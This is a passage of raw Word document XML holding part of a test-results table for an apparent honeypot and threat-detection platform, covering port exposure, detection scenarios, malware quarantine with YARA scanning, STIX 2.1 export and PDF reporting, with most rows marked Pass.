          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">host port 5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Closed; API reachable only through Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">End-to-end detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">simulator, 10 scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All rule classes detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15 classes detected; MALWARE_FAMILY covered by unit test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Malware capture and YARA (E3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH stdin and shell drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sample quarantined 0400 and scanned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored read-only; family identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">STIX 2.1 export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/export/stix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid STIX 2.1 bundle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">59 objects; OASIS stix2 validation passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PDF threat report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/report.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid PDF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
